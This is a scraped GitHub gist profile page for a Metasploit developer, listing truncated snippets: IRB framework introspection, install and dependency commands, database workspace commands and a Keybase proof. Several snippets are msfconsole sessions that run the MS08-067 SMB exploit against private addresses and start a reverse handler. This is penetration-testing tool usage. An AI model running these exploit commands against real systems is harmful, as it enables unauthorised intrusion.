Skip to content

Instantly share code, notes, and snippets.

View wchen-r7's full-sized avatar

sinn3r wchen-r7

View GitHub Profile
msf > irb
[*] Starting IRB shell...
>> require 'method_source'
=> true
>> framework.db.method(:import_ip_list_file).source_location
=> ["/Users/sinn3r/rapid7/msf/lib/msf/core/db_manager/import/ip_list.rb", 18]
>> framework.db.method(:import_ip_list_file).parameters
=> [[:opt, :args]]
>> puts framework.db.method(:import_ip_list_file).source
$ ./msfconsole -q
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80
rhost => 192.168.1.80
msf exploit(ms08_067_netapi) > check
[+] 192.168.1.80:445 - The target is vulnerable.
msf exploit(ms08_067_netapi) > run
[*] Started reverse handler on 192.168.1.64:4444
[*] Automatically detecting the target...
#
# $Id$
# $Revision$
#
module Msf
###
#
# This class hooks all session creation events and plays a sound
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
sinn3r $ cd ~/rapid7/msf
sinn3r $ bundle install
Resolving dependencies...
Using rake 10.4.2
Using i18n 0.6.11
Using multi_json 1.0.4
Using activesupport 3.2.21
Using builder 3.0.4
Using activemodel 3.2.21
Using erubis 2.7.0
sinn3r$ rvm use ruby-1.9.3-p448
Using /Users/sinn3r/.rvm/gems/ruby-1.9.3-p448
sinn3r$ ./msfpayload -h
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Could not find rake-10.4.2 in any of the sources
sudo apt-get -y install \
build-essential zlib1g zlib1g-dev \
libxml2 libxml2-dev libxslt-dev locate \
libreadline6-dev libcurl4-openssl-dev git-core \
libssl-dev libyaml-dev openssl autoconf libtool \
ncurses-dev bison curl wget postgresql \
postgresql-contrib libpq-dev \
libapr1 libaprutil1 libsvn1 \
libpcap-dev libsqlite3-dev
$ msfconsole
msf > set rhost 192.168.1.148
rhost => 192.168.1.148
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
msf > workspace -a demo_for_steve
[*] Added workspace: demo_for_steve
msf > hosts -a "192.168.1.200" <---- Say you wanna modify this host's name and comments
[*] Time: 2015-03-07 19:58:45 UTC Host: host=192.168.1.200
msf > irb
[*] Starting IRB shell...
>> id = framework.db.get_host(:address => '192.168.1.200').id
=> 488
>> framework.db.hosts.update(id, :comments => "This is a new comment")

Keybase proof

I hereby claim:

  • I am wchen-r7 on github.
  • I am wchenr7 (https://keybase.io/wchenr7) on keybase.
  • I have a public key whose fingerprint is D20B 6DC3 3C6B 7252 71A2 258E 2384 DB4E F06F 730B

To claim this, I am signing this object: